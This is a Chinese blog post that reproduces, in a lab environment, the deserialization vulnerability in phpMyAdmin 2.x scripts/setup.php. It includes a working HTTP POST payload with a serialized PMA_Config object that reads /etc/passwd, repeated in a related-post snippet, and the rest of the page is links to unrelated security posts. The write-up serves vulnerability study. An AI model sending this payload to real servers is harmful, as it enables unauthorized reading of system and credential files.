phpmyadmin scripts/setup.php 反序列化漏洞复现实验

已于 2022-03-23 13:48:52 修改
阅读量4.1k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全 php
于 2022-02-25 19:48:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52347768/article/details/123139714
版权

漏洞背景

phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。

漏洞复现:

启动环境,可以看到phpmyadmin的首页,因为没有连接数据库,所以会进行页面报错。

开始进行攻击,在页面使用hackbar,直接这样进行发送数据包

使用burpsuite进行抓包,进行修改,修改如下:

POST /scripts/setup.php HTTP/1.1

Host: ip:8080  

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} //在最末行添加

 

修改完成后即可查看passwd文件内容,复现完成。

努力学习的puppy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin scripts/setup.php 反序列化漏洞
千寻的博客
03-21 1749
序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中,当在php中创建了一个对象后,可以通过把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。序列化就是将对象的状态信息转为字符串储存起来那么反序列化就是再将这个。
WooYun-2016-199433 phpmyadmin 反序列化漏洞
weixin_51387754的博客
12-08 376
漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 漏洞复现 执行如下命令启动phpmyadmin: docker-compose up -d 环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。 发送如下数据包,即可读取/etc/passwd: POST /scripts/setup.php HTTP/1.1 Hos
水域救援设备,保护水域安全_鼎跃安全
ShenZhenDingYue的博客
08-06 125
当然,水域安全问题不仅需要水域救援人员和设备的保障,还需要我们每个人进行水域安全知识的学习和培训,严格遵守当地的水域安全管理条例,在进行水域活动时,尽量结伴而行,保持联系。这些水域安全设备能够为我们水域活动提供保障,也可以提供水域救援的效率,降低安全风险,保障生命安全。与此同时,随着水域经济的蓬勃发展,各类水上及水下娱乐活动日益丰富多样,从刺激的冲浪、潜水到悠闲的划船、垂钓,无一不吸引着四面八方的游客纷至沓来,享受水上乐趣。绳子具有浮力,方便在水面使用,用于远距离救援,将绳子抛给落水者。
域名安全详解
TechEnthusiast的博客
08-06 27
域名安全是网络安全的重要组成部分,涉及多个方面。
【系统架构设计师】二十四、安全架构设计理论与实践②
帅次的博客
08-04 728
安全技术体系架构是对组织机构信息技术系统的安全体系结构的整体描述。安全技术体系架构的目标是建立可持续改进的安全技术体系架构的能力。根据网络中风险威胁的存在实体划分出5个层次的实体对象:应用、存储、主机、网络和物理。
鸿蒙系统开发【加解密算法库框架】安全
2301_76813281的博客
08-02 846
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 394
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
中小型水库雨水情及大坝安全监测系统完整方案
hrdzidonghua的博客
08-06 162
实现对水库雨水情和大坝安全数据采集、汇聚、分析、预警、基础数据管理、现地数据终端在线运维及巡检记录等,并通过GIS一张图将各设备状态信息、实时数据、预警信息进行智能化预测、预报、预警。大坝安全监测系统主要建设内容为埋设安装变形标点/GNSS 坝体位移监测、测压管(渗压计)、量水堰等自动监测仪器设备,对大坝变形、渗压渗流、浸润线监测、渗流量等进行 24 小时的在线数据监测。PC 端:综合监测、水库监测、值班管理、巡查管理、预案管理、责任制管理、维养管理、基础信息管理。
访问网站显示不安全怎么办?
joySSL_的博客
08-02 607
如果您还在使用http协议,那基本上所有的主流浏览器都是都不安全提示需要给网站安装部署一个SSL证书,有预算的话可以使用付费SSL证书,没有预算的话免费SSL证书也可以实现HTTPS。网站的SSL证书过期,或者域名不匹配,解决方式是点击右上角锁头标志查看证书,检查和更新证书,确保它有效、完整。网站被举报含有钓鱼、欺诈等非法问题,解决方法是联系报告方,证明网站已安全,同时全面检查网站,清除隐患。访问网站时显示“不安全”,针对不同的原因有不同的解决方式,下面是常见的几种原因和对应的解决办法。
鸿蒙系统开发【ASN.1密文转换】安全
2301_76813281的博客
08-02 655
本示例对使用@kit.CryptoArchitectureKit加密后的密文格式进行转换。@kit.CryptoArchitectureKit加密后的密文格式默认为以base64显示的ASN.1格式问题,通过对密文进行base64变换后得到字符数组,以16进制数字显示,再此基础上进行密文格式转换,从ASN.1格式转换为c1c3c2格式的裸密文,再以c1c3c2格式的裸密文进行解密,以验证密文转换的正确性。
AI技术如何重塑企业EHS安全健康环保体系,附实践案例
云说智数的博客
08-06 287
在某大型电子工厂中,AI系统通过分析生产数据和环境监测数据,成功预测了一起可能的化学泄漏事故,并及时通知了管理人员采取措施,避免了潜在的环境污染和人员伤亡。某化工厂在发生泄漏事故后,利用AI系统对事故进行了深入分析,不仅快速定位了泄漏源,还发现了操作规程中的缺陷,并据此更新了操作手册,提高了整体的安全管理水平。通过这些实际应用案例,我们可以看到AI技术在EHS管理中的应用潜力和实际效果,它不仅提高了风险管理的效率和准确性,还增强了企业对复杂EHS挑战的应对能力。
【SQL Server】端口安全配置:SQL Server的安全最佳实践与防火墙规则配置
weixin_43298211的博客
08-03 884
在进行任何网络或数据库系统的部署时,确保安全是至关重要的。SQL Server,作为企业级数据库平台,提供了丰富且强大的安全功能。使用加密连接是保护 SQL Server 通信安全的重要手段。防火墙是 SQL Server 安全的第一道防线。完成上述步骤后,Windows 防火墙将允许端口 1434 上的流量,从而确保 SQL Server 可以接收客户端连接。命令配置 SQL Server 使用证书进行加密连接。在上面的示例中,先加载必要的 PowerShell 模块,定义了证书的拇指印。
自学黑客(网络安全
2301_77160226的博客
08-05 2613
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【系统架构设计师】二十四、安全架构设计理论与实践③
帅次的博客
08-04 1715
OSI定义了7层协议,其中除第5层(会话层)外,每一层均能提供相应的安全服务。实际上,最适合配置安全服务的是在物理层、网络层、运输层及应用层上,其他层都不宜配置安全服务。 OSI开放系统互联安全体系的5类安全服务包括鉴别、访问控制、数据机密性、数据完整性和抗抵赖性。 OSI定义分层多点安全技术体系架构,也称为深度防御安全技术体系架构,它通过以下三种方式将防御能力分布至整个信息系统中。
SAP MM学习笔记 - 豆知识03 - 安全在库和最小安全在库,扩张物料的保管场所的几种方法,定义生产订单的默认入库保管场所,受注票中设定禁止贩卖某个物料
shi_ly的专栏
08-06 516
本章讲了几个豆知识,MM01中设定的安全在库和最小安全在库,MM01/MMSC/Customize自动扩张物料的保管场所,MM01中定义生产订单的默认入库保管场所,VA01受注票中禁止贩卖某个品目等。
安全】sql注入,sqli-labs(1-10)
weixin_65583879的博客
08-06 379
MYSQL在5.0版本后会多出一张系统数据库(information_schema),里面记录了所有其他数据库的元数据。
Web 安全之 RCE(Remote Code Execution)攻击详解
最新发布
路多辛的所思所想
08-06 357
RCE(Remote Code Execution,远程代码执行)是一种常见的网络安全攻击方式,攻击者通过利用软件中的漏洞,在目标系统主机上远程执行任意代码。RCE 攻击通常发生在应用程序处理恶意输入时候,因未能正确校验和过滤输入数据,从而导致攻击者能够注入并执行恶意代码,进而控制目标系统,能够执行任何操作,包括窃取数据、安装恶意软件、修改系统配置等。
Linux安全与高级应用(一)深入探讨Linux安全与高级应用
洛秋的博客
08-06 788
Linux系统作为一种开放源代码操作系统,广泛应用于服务器、嵌入式设备以及桌面环境中。开放源代码:允许用户自由获取、修改和分发代码。高稳定性和高效性:适合长时间运行的服务器环境。强大的网络功能:支持多种网络协议和服务。LAMP是Linux、Apache、MySQL和PHP的缩写,是一种常见的Web应用架构。通过构建LAMP平台,可以快速搭建企业级网站。Shell脚本是一种用于批处理任务的脚本语言,能够自动执行一系列命令,极大地提高了系统管理的效率。
深入探索Webkit的Web Authentication API:安全与便捷的融合
liuxin33445566的博客
08-06 283
WebAuthn是一种无密码的认证方法,允许用户使用生物识别、硬件令牌或其它物理设备进行登录,从而减少对传统密码的依赖。这种方法不仅提高了安全性,还改善了用户体验,因为用户不再需要记住复杂的密码。
我的后台服务为什么会有 /phpMyAdmin-2.10.3/scripts/setup.php的访问记录
06-09
这可能是因为您的服务器安装了 phpMyAdmin,而 /phpMyAdmin-2.10.3/scripts/setup.phpphpMyAdmin 的一部分。setup.php 是用于安装和配置 phpMyAdmin 的脚本,因此如果有关于它的访问记录,可能是有人试图在您的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值